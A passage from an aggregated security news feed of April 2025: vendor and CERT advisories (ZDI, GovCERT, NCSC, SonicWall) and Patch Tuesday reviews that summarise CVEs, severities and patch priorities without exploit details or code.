2025-04-09T05:00:00Z | 1744174800

This vulnerability allows remote attackers to execute arbitrary code on affected installations of Ivanti Endpoint Manager. Authentication is required to exploit this vulnerability. The ZDI has assigned a CVSS rating of 7.2. The following CVEs are assigned: CVE-2025-22461.

http://www.zerodayinitiative.com/advisories/ZDI-25-235/
ZDI-25-236: Trend Micro Apex Central modTMSM Server-Side Request Forgery Information Disclosure Vulnerability
2025-04-09T05:00:00Z | 1744174800

This vulnerability allows remote attackers to disclose sensitive information on affected installations of Trend Micro Apex Central. User interaction is required to exploit this vulnerability in that the target must visit a malicious page or open a malicious file. The ZDI has assigned a CVSS rating of 6.5. The following CVEs are assigned: CVE-2025-30678.

http://www.zerodayinitiative.com/advisories/ZDI-25-236/
ZDI-25-237: Trend Micro Apex Central modOSCE Server-Side Request Forgery Information Disclosure Vulnerability
2025-04-09T05:00:00Z | 1744174800

This vulnerability allows remote attackers to disclose sensitive information on affected installations of Trend Micro Apex Central. User interaction is required to exploit this vulnerability in that the target must visit a malicious page or open a malicious file. The ZDI has assigned a CVSS rating of 6.5. The following CVEs are assigned: CVE-2025-30679.

http://www.zerodayinitiative.com/advisories/ZDI-25-237/
ZDI-25-238: Trend Micro Apex Central Query Server-Side Request Forgery Information Disclosure Vulnerability
2025-04-09T05:00:00Z | 1744174800

This vulnerability allows remote attackers to disclose sensitive information on affected installations of Trend Micro Apex Central. Authentication is required to exploit this vulnerability. The ZDI has assigned a CVSS rating of 7.1. The following CVEs are assigned: CVE-2025-30680.

http://www.zerodayinitiative.com/advisories/ZDI-25-238/
ZDI-25-239: Trend Micro Deep Security Link Following Local Privilege Escalation Vulnerability
2025-04-09T05:00:00Z | 1744174800

This vulnerability allows local attackers to escalate privileges on affected installations of Trend Micro Deep Security. An attacker must first obtain the ability to execute low-privileged code on the target system in order to exploit this vulnerability. The ZDI has assigned a CVSS rating of 7.8. The following CVEs are assigned: CVE-2025-30640.

http://www.zerodayinitiative.com/advisories/ZDI-25-239/
ZDI-25-240: Trend Micro Deep Security Anti-Malware Solution Platform Link Following Local Privilege Escalation Vulnerability
2025-04-09T05:00:00Z | 1744174800

This vulnerability allows local attackers to escalate privileges on affected installations of Trend Micro Deep Security Agent. An attacker must first obtain the ability to execute low-privileged code on the target system in order to exploit this vulnerability. The ZDI has assigned a CVSS rating of 7.8. The following CVEs are assigned: CVE-2025-30641.

http://www.zerodayinitiative.com/advisories/ZDI-25-240/
ZDI-25-241: Trend Micro Deep Security Agent Link Following Denial-of-Service Vulnerability
2025-04-09T05:00:00Z | 1744174800

This vulnerability allows local attackers to create a denial-of-service condition on affected installations of Trend Micro Deep Security Agent. An attacker must first obtain the ability to execute low-privileged code on the target system in order to exploit this vulnerability. The ZDI has assigned a CVSS rating of 5.5. The following CVEs are assigned: CVE-2025-30642.

http://www.zerodayinitiative.com/advisories/ZDI-25-241/
ZDI-25-242: MedDream PACS Server DICOM File Parsing Stack-based Buffer Overflow Remote Code Execution Vulnerability
2025-04-09T05:00:00Z | 1744174800

This vulnerability allows remote attackers to execute arbitrary code on affected installations of MedDream PACS Server. Authentication is not required to exploit this vulnerability. The ZDI has assigned a CVSS rating of 9.8. The following CVEs are assigned: CVE-2025-3484.

http://www.zerodayinitiative.com/advisories/ZDI-25-242/
ZDI-25-243: MedDream PACS Server DICOM File Parsing Stack-based Buffer Overflow Remote Code Execution Vulnerability
2025-04-09T05:00:00Z | 1744174800

This vulnerability allows remote attackers to execute arbitrary code on affected installations of MedDream PACS Server. Authentication is not required to exploit this vulnerability. The ZDI has assigned a CVSS rating of 9.8. The following CVEs are assigned: CVE-2025-3483.

http://www.zerodayinitiative.com/advisories/ZDI-25-243/
ZDI-25-244: MedDream PACS Server DICOM File Parsing Stack-based Buffer Overflow Remote Code Execution Vulnerability
2025-04-09T05:00:00Z | 1744174800

This vulnerability allows remote attackers to execute arbitrary code on affected installations of MedDream PACS Server. Authentication is not required to exploit this vulnerability. The ZDI has assigned a CVSS rating of 9.8. The following CVEs are assigned: CVE-2025-3482.

http://www.zerodayinitiative.com/advisories/ZDI-25-244/
ZDI-25-245: MedDream PACS Server DICOM File Parsing Stack-based Buffer Overflow Remote Code Execution Vulnerability
2025-04-09T05:00:00Z | 1744174800

This vulnerability allows remote attackers to execute arbitrary code on affected installations of MedDream PACS Server. Authentication is not required to exploit this vulnerability. The ZDI has assigned a CVSS rating of 9.8. The following CVEs are assigned: CVE-2025-3481.

http://www.zerodayinitiative.com/advisories/ZDI-25-245/
ZDI-25-246: MedDream WEB DICOM Viewer Cleartext Transmission of Credentials Information Disclosure Vulnerability
2025-04-09T05:00:00Z | 1744174800

This vulnerability allows network-adjacent attackers to disclose sensitive information on affected installations of MedDream WEB DICOM Viewer. Authentication is not required to exploit this vulnerability. The ZDI has assigned a CVSS rating of 5.3. The following CVEs are assigned: CVE-2025-3480.

http://www.zerodayinitiative.com/advisories/ZDI-25-246/
High Threat Security Alert (A25-04-08): Multiple Vulnerabilities in Microsoft Products (April 2025)
2025-04-09T04:00:00Z | 1744171200

Microsoft has released security updates addressing multiple vulnerabilities which affect several Microsoft products or components.

https://www.govcert.gov.hk/en/alerts_detail.php
Security Alert (A25-04-09): Vulnerability in Google Chrome
2025-04-09T04:00:00Z | 1744171200

Google released a security update to address vulnerability in Google Chrome.

https://www.govcert.gov.hk/en/alerts_detail.php
Security Alert (A25-04-10): Multiple Vulnerabilities in Fortinet Products
2025-04-09T04:00:00Z | 1744171200

Fortinet released security advisories to address multiple vulnerabilities in Fortinet systems.

https://www.govcert.gov.hk/en/alerts_detail.php
BADBAZAAR and MOONSHINE: Technical analysis and mitigations
2025-04-09T02:36:37Z | 1744166197

This advisory provides new and collated threat intelligence on two variants of spyware known as BADBAZAAR and MOONSHINE, and includes advice for app store operators, developers and social media companies to help keep their users safe.

https://www.ncsc.gov.uk/news/advisory-badbazaar-moonshine-technical-analysis-mitigations
NCSC and partners share guidance for communities at high risk of digital surveillance
2025-04-09T02:35:04Z | 1744166104

Spyware variants MOONSHINE and BADBAZAAR are being used to target mobile devices of individuals around the world.

https://www.ncsc.gov.uk/news/ncsc-partners-share-guidance-for-communities-at-high-risk-of-digital-surveillance
Security Alert: Microsoft Releases April 2025 Security Updates
2025-04-09T02:11:00Z | 1744164660

Security Alert: Microsoft Releases April 2025 Security Updates

https://www.jpcert.or.jp/english/at/2025/at250009.html
The Science Behind Visualizing Modern Attacks by Erik Evangelista
2025-04-09T00:00:00Z | 1744156800

Cyber threats are complex—visuals help make sense of them. See how Cognitive Load Theory shows why clear design matters in keeping systems secure.

https://www.vectra.ai/blog/the-science-behind-visualizing-modern-attacks
April 2025 Patch Tuesday
2025-04-08T21:19:58Z | 1744147198

April Patch Tuesday appears to be a high count of resolved CVEs, but a low number of high priority risks. Microsoft has resolved 121 new unique CVEs this month, 11 of which are rated critical and one known to be exploited. The zero-day vulnerability is in the Windows OS this month, making that your top priority. In addition, Adobe has released 12 updates resolving 54 CVEs. Adobe ColdFusion was rated highest (Priority 1) and resolves 15 CVEs. Adobe Commerce and Experience Manager Forms were rated Priority 2 and resolved five CVEs and two CVEs respectively. The rest of the Adobe lineup was Priority 3. Update your browsers! Google Chrome updated this Patch Tuesday resolving two additional CVEs. On April 1, both Mozilla Firefox and Google Chrome updated. Mozilla Firefox resolved eight CVEs, and Chrome resolved thirteen CVEs. Microsoft Edge (Chromium) updated on April 3 in response to the April 1 Chrome update, which means we will have an additional Edge update coming later this week. Oracle is due to release their quarterly CPU on April 15, so keep an eye out for Oracle updates including Java, which will kick off the domino effect of alternative Java frameworks getting updates through the end of April and into early May. Microsoft exploited vulnerabilities Microsoft resolved an Elevation of Privilege vulnerability in Windows Common Log File System Driver (CVE-2025-29824) that could allow an attacker to gain SYSTEM privileges on the affected system. The vulnerability affects all Windows OS versions. The vulnerability is confirmed to be exploited in the wild. Microsoft severity is rated as Important and has CVSS 3.1 of 7.8. Risk-based prioritization warrants treating this vulnerability as Critical. Third-party vulnerabilities Adobe released updates for most of the Creative Suite including After Effects, Animate, Bridge, Illustrator, Media Encoder, Photoshop and Premiere Pro. Google Chrome released an update resolving two CVEs. Expect Edge to be released later this week. Oracle’s quarterly CPU is scheduled for April 15, 2025. Expect updates for a number of Oracle products, but this release will also kick off the domino effect on all Java frameworks like RedHat OpenJDK, Amazon Corretto, Azul Zulu, Eclipse Adoptium, Adopt OpenJDK and others. Ivanti security advisory Ivanti has released one update for April Patch Tuesday resolving a total of six CVEs. The affected products include Ivanti EPM 2022 and EPM 2024. For more details you can view the updates and information provided in the April Security Update on the Ivanti blog. April update priorities The Windows OS is your top priority this month, with the only zero-day exploit reported (CVE-2025-29824). Update all of your browsers! Last week Mozilla, Chrome and Edge received updates, and an additional Chrome update was released on Patch Tuesday. If you have not already, you should consider moving browser updates to a weekly cadence to reduce exposure time, as Chrome and Edge will receive weekly updates, and Firefox typically has two to three updates per month. Expect Oracle updates on April 15 and additional updates for Java frameworks over the next few weeks.

https://www.ivanti.com/blog/april-2025-patch-tuesday
SonicWall NetExtender Windows Client Multiple Vulnerabilities
2025-04-08T20:58:05Z | 1744145885

1) CVE-2025-23008 - SonicWall NetExtender Improper Privilege Management VulnerabilityAn improper privilege management vulnerability in the SonicWall NetExtender Windows (32 and 64 bit) client allows a low privileged attacker to modify configurations. CVSS Score: 7.2 CVSS Vector: CVSS:3.0/AV:P/AC:L/PR:L/UI:R/S:C/C:H/I:H/A:H CWE-250: Execution with Unnecessary Privileges 2) CVE-2025-23009 - SonicWall NetExtender Local Privilege Escalation VulnerabilityA local privilege escalation vulnerability in SonicWall NetExtender Windows (32 and 64 bit) client which allows an attacker to trigger an arbitrary file deletion. CVSS Score: 5.9 CVSS Vector: CVSS:3.0/AV:L/AC:L/PR:L/UI:R/S:C/C:N/I:H/A:N CWE-250: Execution with Unnecessary Privileges 3) CVE-2025-23010 - SonicWall NetExtender Improper Link Resolution Before File Access ('Link Following')An Improper Link Resolution Before File Access ('Link Following') vulnerability in SonicWall NetExtender Windows (32 and 64 bit) client which allows an attacker to manipulate file paths. CVSS Score: 6.5 CVSS Vector: CVSS:3.0/AV:L/AC:L/PR:L/UI:N/S:C/C:N/I:N/A:H CWE-59: Improper Link Resolution Before File Access ('Link Following') There is no evidence that these vulnerabilities are being exploited in the wild. SonicWall strongly advises users of the NetExtender Windows (32 and 64 bit) client to upgrade to the mentioned fixed release version to address these vulnerabilities. CVE: CVE-2025-23008, CVE-2025-23009, CVE-2025-23010 Last updated: April 8, 2025, 8:58 p.m.

https://psirt.global.sonicwall.com/vuln-detail/SNWLID-2025-0006
Palo Alto Networks Surpasses $1.5 Billion in Sales on Google Cloud Marketplace
2025-04-08T20:00:00Z | 1744142400

AI-powered integrations securely enable customer cloud adoption and growth SANTA CLARA, Calif. , April 8, 2025 /PRNewswire/ -- Palo Alto Networks ® (NASDAQ: PANW), the global cybersecurity leader, today announced that the company has surpassed $1.5 billion in cumulative sales through Google Cloud

https://investors.paloaltonetworks.com/news-releases/news-release-details/palo-alto-networks-surpasses-15-billion-sales-google-cloud
Microsoft patchetirsdag april 2025
2025-04-08T19:13:56Z | 1744139636

Microsoft vurderer 11 sårbarheter som kritiske i månedens sikkerhetsoppdatering. Flere av sårbarhetene kan utnyttes til å kjøre kode over internett.

https://nsm.no/fagomrader/digital-sikkerhet/nasjonalt-cybersikkerhetssenter/varsler-fra-ncsc/microsoft-patchetirsdag-april-2025
The April 2025 Security Update Review
2025-04-08T18:14:25Z | 1744136065

It’s the second Tuesday of the month, and, as expected, Microsoft and Adobe have released their latest security offerings – all tariff free. Take a break from your scheduled activities and join us as we review the details of their latest security alerts. If you’d rather watch the full video recap covering the entire release, you can check it out here: Adobe Patches for April 2025For April, Adobe released 12 bulletins addressing 54 CVEs in Adobe Cold Fusion, After Effects, Media Encoder, Bridge, Commerce, AEM Forms, Premiere Pro, Photoshop, Animate, AEM Screens, FrameMaker, and the Adobe XMP Toolkit SDK. Adobe lists the update for Cold Fusion as Priority 1 but states there are no exploits in the wild for the bugs being patched. The patch for AEM Forms is set to Priority 2. These aren’t new CVEs; just updates to dependencies. The patch for Commerce is also marked as Priority 2, although the CVEs being addressed are Important and Moderate. Still, the security bypasses shouldn’t be ignored. All of the other patches from Adobe are listed as Priority 3.The patch for After Effects fixes seven bugs, two of which are Critical code execution flaws. The fix for Media Encoder corrects two code execution bugs. There’s just a single Critical fix in the Bridge update. That’s the same for the patches for Premiere Pro and Photoshop. The patch for Animate addresses two Critical and two Important bugs. The AEM Screens patch fixes a single cross-site scripting (XSS) bug. The update for FrameMaker fixes 10 CVEs, including several code execution bugs. Finally, the patch for the Adobe XMP Toolkit SDK fixes five different Out-of-Bounds (OOB) Read memory leaks.None of the bugs fixed by Adobe this month are listed as publicly known or under active attack at the time of release. Microsoft Patches for April 2025This month, Microsoft released a whopping 124 new CVEs in Windows and Windows Components, Office and Office Components, Azure, .NET and Visual Studio, BitLocker, Kerberos, Windows Hello, OpenSSH, and Windows Lightweight Directory Access Protocol (LDAP). One of these bugs was reported through the Trend ZDI program. With the additional third-party CVEs being documented, it brings the combined total to 134 CVEs.Of the patches released today, 11 are rated Critical, two are rated Low, and the rest are rated Important in severity. The April release tends to be heavier, and this level of output doesn’t disappoint. It’s a small comfort that only one of these bugs is listed as publicly known or under active attack at the time of release.Let’s take a closer look at some of the more interesting updates for this month, starting with the vulnerability currently being exploited in the wild:-   CVE-2025-29824 - Windows Common Log File System Driver Elevation of Privilege VulnerabilityThis privilege escalation bug is listed as under active attack and allows a threat actor to execute their code with SYSTEM privileges. These types of bugs are often paired with code execution bugs to take over a system. Microsoft gives no indication of how widespread these attacks are. Regardless, test and deploy this update quickly.-   CVE-2025-26663/CVE-2025-26670 - Windows Lightweight Directory Access Protocol (LDAP) Remote Code Execution Vulnerability These bugs allow a remote, unauthenticated attacker to execute their code on affected systems just by sending a specially crafted LDAP message. They would need to win a race condition, but we’ve seen plenty of exploits work around this requirement. Since just about everything can host an LDAP service, there’s a plethora of targets out there. And since no user interaction is involved, these bugs are wormable. LDAP really shouldn’t be allowed through your network perimeter, but don’t rely on that alone. Test and deploy these updates quickly – unless you’re running Windows 10. Those patches aren’t available yet.-  CVE-2025-27480/CVE-2025-27482 - Windows Remote Desktop Services Remote Code Execution VulnerabilityHere are some more Critical-rated bugs that don’t rely on user interaction. An attacker just needs to connect to an affected system with the Remote Desktop Gateway role to trigger another race condition, resulting in code execution. RDS is popular for remote management, so it is often reachable from the Internet. If you must leave it open to the world, consider IP restricting it to known users, then test and deploy these patches.-  CVE-2025-29809 - Windows Kerberos Security Feature Bypass Vulnerability There are several security feature bypass (SFB) bugs in this release, but this one stands out above the others. A local attacker could abuse this vulnerability to leak Kerberos credentials. And you may need to take actions beyond just patching. If you rely on Virtualization-Based Security (VBS), you’ll need to read this document and then redeploy with the updated policy.Here’s the full list of CVEs released by Microsoft for April 2025: CVE Title Severity CVSS Public Exploited Type CVE-2025-29824 Windows Common Log File System Driver Elevation of Privilege Vulnerability Important 7.8 No Yes EoP CVE-2025-26670 Lightweight Directory Access Protocol (LDAP) Client Remote Code Execution Vulnerability Critical 8.1 No No RCE CVE-2025-27752 Microsoft Excel Remote Code Execution Vulnerability Critical 7.8 No No RCE CVE-2025-29791 Microsoft Excel Remote Code Execution Vulnerability Critical 7.8 No No RCE CVE-2025-27745 Microsoft Office Remote Code Execution Vulnerability Critical 7.8 No No RCE CVE-2025-27748 Microsoft Office Remote Code Execution Vulnerability Critical 7.8 No No RCE CVE-2025-27749 Microsoft Office Remote Code Execution Vulnerability Critical 7.8 No No RCE CVE-2025-27491 Windows Hyper-V Remote Code Execution Vulnerability Critical 7.1 No No RCE CVE-2025-26663 Windows Lightweight Directory Access Protocol (LDAP) Remote Code Execution Vulnerability Critical 8.1 No No RCE CVE-2025-27480 Windows Remote Desktop Services Remote Code Execution Vulnerability Critical 8.1 No No RCE CVE-2025-27482 Windows Remote Desktop Services Remote Code Execution Vulnerability Critical 8.1 No No RCE CVE-2025-26686 Windows TCP/IP Remote Code Execution Vulnerability Critical 7.5 No No RCE CVE-2025-27740 Active Directory Certificate Services Elevation of Privilege Vulnerability Important 8.8 No No EoP CVE-2025-29810 Active Directory Domain Services Elevation of Privilege Vulnerability Important 7.5 No No EoP CVE-2025-26682 ASP.NET Core and Visual Studio Denial of Service Vulnerability Important 7.5 No No DoS CVE-2025-25002 Azure Local Cluster Information Disclosure Vulnerability Important 6.8 No No Info CVE-2025-26628 Azure Local Cluster Information Disclosure Vulnerability Important 7.3 No No Info CVE-2025-27489 Azure Local Elevation of Privilege Vulnerability Important 7.8 No No EoP CVE-2025-26637 BitLocker Security Feature Bypass Vulnerability Important 6.8 No No SFB CVE-2025-29812 DirectX Graphics Kernel Elevation of Privilege Vulnerability Important 7.8 No No EoP CVE-2025-27473 HTTP.sys Denial of Service Vulnerability Important 7.5 No No DoS CVE-2025-27479 Kerberos Key Distribution Proxy Service Denial of Service Vulnerability Important 7.5 No No DoS CVE-2025-29800 Microsoft AutoUpdate (MAU) Elevation of Privilege Vulnerability Important 7.8 No No EoP CVE-2025-29801 Microsoft AutoUpdate (MAU) Elevation of Privilege Vulnerability Important 7.8 No No EoP CVE-2025-24060 Microsoft DWM Core Library Elevation of Privilege Vulnerability Important 7.8 No No EoP CVE-2025-24062 Microsoft DWM Core Library Elevation of Privilege Vulnerability Important 7.8 No No EoP CVE-2025-24073 Microsoft DWM Core Library Elevation of Privilege Vulnerability Important 7.8 No No EoP CVE-2025-24074 Microsoft DWM Core Library Elevation of Privilege Vulnerability Important 7.8 No No EoP CVE-2025-29821 Microsoft Dynamics Business Central Information Disclosure Vulnerability Important 5.5 No No Info CVE-2025-29815 Microsoft Edge (Chromium-based) Remote Code Execution Vulnerability Important 7.6 No No RCE CVE-2025-27750 Microsoft Excel Remote Code Execution Vulnerability Important 7.8 No No RCE CVE-2025-27751 Microsoft Excel Remote Code Execution Vulnerability Important 7.8 No No RCE CVE-2025-29823 Microsoft Excel Remote Code Execution Vulnerability Important 7.8 No No RCE CVE-2025-26641 Microsoft Message Queuing (MSMQ) Denial of Service Vulnerability Important 7.5 No No DoS CVE-2025-27744 Microsoft Office Elevation of Privilege Vulnerability Important 7.8 No No EoP CVE-2025-29792 Microsoft Office Elevation of Privilege Vulnerability Important 7.3 No No EoP CVE-2025-26642 Microsoft Office Remote Code Execution Vulnerability Important 7.8 No No RCE CVE-2025-27746 Microsoft Office Remote Code Execution Vulnerability Important 7.8 No No RCE CVE-2025-29822 Microsoft OneNote Security Feature Bypass Vulnerability Important 7.8 No No SFB CVE-2025-27731 Microsoft OpenSSH for Windows Elevation of Privilege Vulnerability Important 7.8 No No EoP CVE-2025-29793 Microsoft SharePoint Remote Code Execution Vulnerability Important 7.2 No No RCE CVE-2025-29794 Microsoft SharePoint Remote Code Execution Vulnerability Important 8.8 No No RCE CVE-2025-27471 Microsoft Streaming Service Denial of Service Vulnerability Important 5.9 No No DoS CVE-2025-27743 † Microsoft System Center Elevation of Privilege Vulnerability Important 7.8 No No EoP CVE-2025-26688 Microsoft Virtual Hard Disk Elevation of Privilege Vulnerability Important 7.8 No No EoP CVE-2025-27747 Microsoft Word Remote Code Execution Vulnerability Important 7.8 No No RCE CVE-2025-29820 Microsoft Word Remote Code Execution Vulnerability Important 7.8 No No RCE CVE-2025-29816 Microsoft Word Security Feature Bypass Vulnerability Important 7.5 No No SFB CVE-2025-27483 NTFS Elevation of Privilege Vulnerability Important 7.8 No No EoP CVE-2025-27733 NTFS Elevation of Privilege Vulnerability Important 7.8 No No EoP CVE-2025-27741 NTFS Elevation of Privilege Vulnerability Important 7.8 No No EoP CVE-2025-27742 NTFS Information Disclosure Vulnerability Important 5.5 No No Info CVE-2025-29805 Outlook for Android Information Disclosure Vulnerability Important 7.5 No No Info CVE-2025-27487 Remote Desktop Client Remote Code Execution Vulnerability Important 8 No No RCE CVE-2025-26679 RPC Endpoint Mapper Service Elevation of Privilege Vulnerability Important 7.8 No No EoP CVE-2025-20570 Visual Studio Code Elevation of Privilege Vulnerability Important 6.8 No No EoP CVE-2025-29802 Visual Studio Elevation of Privilege Vulnerability Important 7.3 No No EoP CVE-2025-29804 Visual Studio Elevation of Privilege Vulnerability Important 7.3 No No EoP CVE-2025-29803 Visual Studio Tools for Applications and SQL Server Management Studio Elevation of Privilege Vulnerability Important 7.3 No No EoP CVE-2025-26681 Win32k Elevation of Privilege Vulnerability Important 6.7 No No EoP CVE-2025-26687 Win32k Elevation of Privilege Vulnerability Important 7.5 No No EoP CVE-2025-29819 Windows Admin Center in Azure Portal Information Disclosure Vulnerability Important 6.2 No No Info CVE-2025-27490 Windows Bluetooth Service Elevation of Privilege Vulnerability Important 7.8 No No EoP CVE-2025-29808 Windows Cryptographic Services Information Disclosure Vulnerability Important 5.5 No No Info CVE-2025-26678 Windows Defender Application Control Security Feature Bypass Vulnerability Important 8.4 No No SFB CVE-2025-26640 Windows Digital Media Elevation of Privilege Vulnerability Important 7 No No EoP CVE-2025-27467 Windows Digital Media Elevation of Privilege Vulnerability Important 7.8 No No EoP CVE-2025-27476 Windows Digital Media Elevation of Privilege Vulnerability Important 7.8 No No EoP CVE-2025-27730 Windows Digital Media Elevation of Privilege Vulnerability Important 7.8 No No EoP CVE-2025-24058 Windows DWM Core Library Elevation of Privilege Vulnerability Important 7.8 No No EoP CVE-2025-27732 Windows Graphics Component Elevation of Privilege Vulnerability Important 7 No No EoP CVE-2025-26635 Windows Hello Security Feature Bypass Vulnerability Important 6.5 No No SFB CVE-2025-26644 Windows Hello Spoofing Vulnerability Important 6.2 No No Spoofing CVE-2025-27727 Windows Installer Elevation of Privilege Vulnerability Important 7.8 No No EoP CVE-2025-26647 Windows Kerberos Elevation of Privilege Vulnerability Important 8.1 No No EoP CVE-2025-29809 † Windows Kerberos Security Feature Bypass Vulnerability Important 7.1 No No SFB CVE-2025-26648 Windows Kernel Elevation of Privilege Vulnerability Important 7.8 No No EoP CVE-2025-27739 Windows Kernel Elevation of Privilege Vulnerability Important 7.8 No No EoP CVE-2025-27728 Windows Kernel-Mode Driver Elevation of Privilege Vulnerability Important 7.8 No No EoP CVE-2025-26673 Windows Lightweight Directory Access Protocol (LDAP) Denial of Service Vulnerability Important 7.5 No No DoS CVE-2025-27469 Windows Lightweight Directory Access Protocol (LDAP) Denial of Service Vulnerability Important 7.5 No No DoS CVE-2025-21191 Windows Local Security Authority (LSA) Elevation of Privilege Vulnerability Important 7 No No EoP CVE-2025-27478 Windows Local Security Authority (LSA) Elevation of Privilege Vulnerability Important 7 No No EoP CVE-2025-26651 Windows Local Session Manager (LSM) Denial of Service Vulnerability Important 6.5 No No DoS CVE-2025-27472 Windows Mark of the Web Security Feature Bypass Vulnerability Important 5.4 No No SFB CVE-2025-26666 Windows Media Remote Code Execution Vulnerability Important 7.8 No No RCE CVE-2025-26674 Windows Media Remote Code Execution Vulnerability Important 7.8 No No RCE CVE-2025-29811 Windows Mobile Broadband Driver Elevation of Privilege Vulnerability Important 7.8 No No EoP CVE-2025-21197 Windows NTFS Information Disclosure Vulnerability Important 6.5 No No Info CVE-2025-27736 Windows Power Dependency Coordinator Information Disclosure Vulnerability Important 5.5 No No Info CVE-2025-21204 Windows Process Activation Elevation of Privilege Vulnerability Important 7.8 No No EoP CVE-2025-26671 Windows Remote Desktop Services Remote Code Execution Vulnerability Important 8.1 No No RCE CVE-2025-27738 Windows Resilient File System (ReFS) Information Disclosure Vulnerability Important 6.5 No No Info CVE-2025-21203 Windows Routing and Remote Access Service (RRAS) Information Disclosure Vulnerability Important 6.5 No No Info CVE-2025-26664 Windows Routing and Remote Access Service (RRAS) Information Disclosure Vulnerability Important 6.5 No No Info CVE-2025-26667 Windows Routing and Remote Access Service (RRAS) Information Disclosure Vulnerability Important 6.5 No No RCE CVE-2025-26669 Windows Routing and Remote Access Service (RRAS) Information Disclosure Vulnerability Important 8.8 No No Info CVE-2025-26672 Windows Routing and Remote Access Service (RRAS) Information Disclosure Vulnerability Important 6.5 No No Info CVE-2025-26676 Windows Routing and Remote Access Service (RRAS) Information Disclosure Vulnerability Important 6.5 No No Info CVE-2025-27474 Windows Routing and Remote Access Service (RRAS) Information Disclosure Vulnerability Important 6.5 No No Info CVE-2025-26668 Windows Routing and Remote Access Service (RRAS) Remote Code Execution Vulnerability Important 7.5 No No RCE CVE-2025-26649 Windows Secure Channel Elevation of Privilege Vulnerability Important 7 No No EoP CVE-2025-27492 Windows Secure Channel Elevation of Privilege Vulnerability Important 7 No No EoP CVE-2025-27737 Windows Security Zone Mapping Security Feature Bypass Vulnerability Important 8.6 No No SFB CVE-2025-27729 Windows Shell Remote Code Execution Vulnerability Important 7.8 No No RCE CVE-2025-21174 Windows Standards-Based Storage Management Service Denial of Service Vulnerability Important 7.5 No No DoS CVE-2025-26652 Windows Standards-Based Storage Management Service Denial of Service Vulnerability Important 7.5 No No DoS CVE-2025-26680 Windows Standards-Based Storage Management Service Denial of Service Vulnerability Important 7.5 No No DoS CVE-2025-27470 Windows Standards-Based Storage Management Service Denial of Service Vulnerability Important 7.5 No No DoS CVE-2025-27485 Windows Standards-Based Storage Management Service Denial of Service Vulnerability Important 7.5 No No DoS CVE-2025-27486 Windows Standards-Based Storage Management Service Denial of Service Vulnerability Important 7.5 No No DoS CVE-2025-26675 Windows Subsystem for Linux Elevation of Privilege Vulnerability Important 7.8 No No EoP CVE-2025-21205 Windows Telephony Service Remote Code Execution Vulnerability Important 8.8 No No RCE CVE-2025-21221 Windows Telephony Service Remote Code Execution Vulnerability Important 8.8 No No RCE CVE-2025-21222 Windows Telephony Service Remote Code Execution Vulnerability Important 8.8 No No RCE CVE-2025-27477 Windows Telephony Service Remote Code Execution Vulnerability Important 8.8 No No RCE CVE-2025-27481 Windows Telephony Service Remote Code Execution Vulnerability Important 8.8 No No RCE CVE-2025-27484 Windows Universal Plug and Play (UPnP) Device Host Elevation of Privilege Vulnerability Important 7.5 No No EoP CVE-2025-27475 Windows Update Stack Elevation of Privilege Vulnerability Important 7 No No EoP CVE-2025-26665 Windows upnphost.dll Elevation of Privilege Vulnerability Important 7 No No EoP CVE-2025-26639 Windows USB Print Driver Elevation of Privilege Vulnerability Important 7.8 No No EoP CVE-2025-27735 Windows Virtualization-Based Security (VBS) Security Feature Bypass Vulnerability Important 6 No No SFB CVE-2025-25001 Microsoft Edge for iOS Spoofing Vulnerability Low 4.3 No No Spoofing CVE-2025-29796 Microsoft Edge for iOS Spoofing Vulnerability Low 4.7 No No Spoofing CVE-2025-3066 * Chromium: CVE-2025-3066 Use after free in Navigations High N/A No No RCE CVE-2025-3067 * Chromium: CVE-2025-3067 Inappropriate implementation in Custom Tabs Medium N/A No No N/A CVE-2025-3068 * Chromium: CVE-2025-3068 Inappropriate implementation in Intents Medium N/A No No N/A CVE-2025-3069 * Chromium: CVE-2025-3069 Inappropriate implementation in Extensions Medium N/A No No N/A CVE-2025-3070 * Chromium: CVE-2025-3070 Insufficient validation of untrusted input in Extensions Medium N/A No No N/A CVE-2025-3071 * Chromium: CVE-2025-3071 Inappropriate implementation in Navigations Low N/A No No N/A CVE-2025-3072 * Chromium: CVE-2025-3072 Inappropriate implementation in Custom Tabs Low N/A No No N/A CVE-2025-3073 * Chromium: CVE-2025-3073 Inappropriate implementation in Autofill Low N/A No No N/A CVE-2025-3074 * Chromium: CVE-2025-3074 Inappropriate implementation in Downloads Low N/A No No N/A * Indicates this CVE had been released by a third party and is now being included in Microsoft releases.† Indicates further administrative actions are required to fully address the vulnerability.Looking at the other Critical-rated patches, there are several impacting Office and Excel. For all of these bugs, the Preview Pane is an attack vector, but Microsoft lists that user interaction is required. I’m not sure how to reconcile that other than to think maybe a user needs to manually preview an attachment from the Preview Pane. And Mac users are out of luck because the updates for Microsoft Office LTSC for Mac 2021 and 2024 are not available yet. There’s a Critical-rated Hyper-V bug, but it relies on authentication and social engineering, so it’s unlikely to be exploited in the wild. The final Critical bug is for TCP/IP and sounds intriguing. It centers around DHCPv6. An attacker could send a crafted response to a legitimate DHCPv6 request to execute code on the target system. That would usually require a Machine-in-the-Middle (MitM) type of attack. I would love to know how a crafted response leads to code execution. Hopefully, the researcher who reported this to Microsoft will publish their findings now that the bug is patched. Moving on to the other code execution bugs, there are additional open-and-own bugs in Office components, but these do not have a Preview Pane vector. There’s also this month’s crop of RRAS and Telephony Service bugs. These seem to be a staple of every release now. There’s a bug in the RDP client, but it requires someone to connect to a malicious server. There are two bugs in SharePoint that confuse me. Both say that “Site Owner” permissions are required for exploitation, but one lists this as Low privilege while the other lists it as High. This lack of consistency from Microsoft is frustrating. Speaking of inconsistencies, there’s another RDS Gateway bug identical to the two already documented above. However, this one is rated Important instead of Critical. Same description. Same CVSS score. Even the same researcher. ¯\_(ツ)_/¯There are nearly 50 privilege escalation bugs in this month’s release, and most of these simply either lead to SYSTEM-level code execution or administrative privileges if an authenticated user runs specially crafted code (or ROOT in the case of Microsoft AutoUpdate for Mac). As always, there are some notable exceptions. The bug in Azure could allow the loading of DLLs into an enclave, which could then be used for code execution within that enclave. The bugs in Visual Studio could allow an attacker to escalate to a targeted user’s level. The bugs in Digital Media could allow for escalating code to run at Medium integrity. One of the bugs in the kernel could allow for an escalation to Secure Kernel. This is a newer feature, and if I’m not mistaken, this is the first bug of its kind. The bug in Kerberos is interesting as it allows an attacker to gain additional privileges from the Key Distribution Center. However, there are quite a few extra steps involved, including having a MitM. The final EoP this month is in System Center, however, there is no patch available as no existing System Center deployments are impacted. In the spirit of consistency, Microsoft also notes that only customers who re-use existing System Center installer files to deploy new instances in their environment are affected by this vulnerability – so maybe some versions are impacted. Instead of a patch, Microsoft recommends users delete the existing installer setup files (.exe) and then download the latest version of their 